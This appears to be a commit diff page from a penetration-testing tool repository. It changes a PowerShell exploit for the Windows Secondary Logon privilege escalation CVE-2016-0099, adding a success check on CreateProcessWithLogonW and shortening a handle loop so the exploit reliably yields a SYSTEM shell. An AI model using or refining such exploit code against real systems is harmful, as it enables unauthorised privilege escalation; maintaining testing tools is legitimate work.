Land #7151, Improve CVE-2016-0099 reliability
commit
d1f65b27b8
|
@ -242,8 +242,8 @@ Add-Type -TypeDefinition @"
|
|||
$TidArray = @()
|
||||
|
||||
echo "[>] Duplicating CreateProcessWithLogonW handles.."
|
||||
# Loop Get-ThreadHandle and collect thread handles with a valid TID
|
||||
for ($i=0; $i -lt 500; $i++) {
|
||||
# Loop 1 is fine, this never fails unless patched in which case the handle is 0
|
||||
for ($i=0; $i -lt 1; $i++) {
|
||||
$hThread = Get-ThreadHandle
|
||||
$hThreadID = [Kernel32]::GetThreadId($hThread)
|
||||
# Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
|
||||
|
@ -309,6 +309,19 @@ Add-Type -TypeDefinition @"
|
|||
0x00000002, $cmd, $args1,
|
||||
0x00000004, $null, $GetCurrentPath,
|
||||
[ref]$StartupInfo, [ref]$ProcessInfo)
|
||||
|
||||
#---
|
||||
# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
|
||||
#---
|
||||
# Missing this check used to cause the exploit to fail sometimes.
|
||||
# If CreateProcessWithLogon fails OpenProcessToken won't succeed
|
||||
# but we obviously don't have a SYSTEM shell :'( . Should be 100%
|
||||
# reliable now!
|
||||
#---
|
||||
if (!$CallResult) {
|
||||
continue
|
||||
}
|
||||
|
||||
$hTokenHandle = [IntPtr]::Zero
|
||||
$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
|
||||
|
||||
|
|
Loading…
Reference in New Issue